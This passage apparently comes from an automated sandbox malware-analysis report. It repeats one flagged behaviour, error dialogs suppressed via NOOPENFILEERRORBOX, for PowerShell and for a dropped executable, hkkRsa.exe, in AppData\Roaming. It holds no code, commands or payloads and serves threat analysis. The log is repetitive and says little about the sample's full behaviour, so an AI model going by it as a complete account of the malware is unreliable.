          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
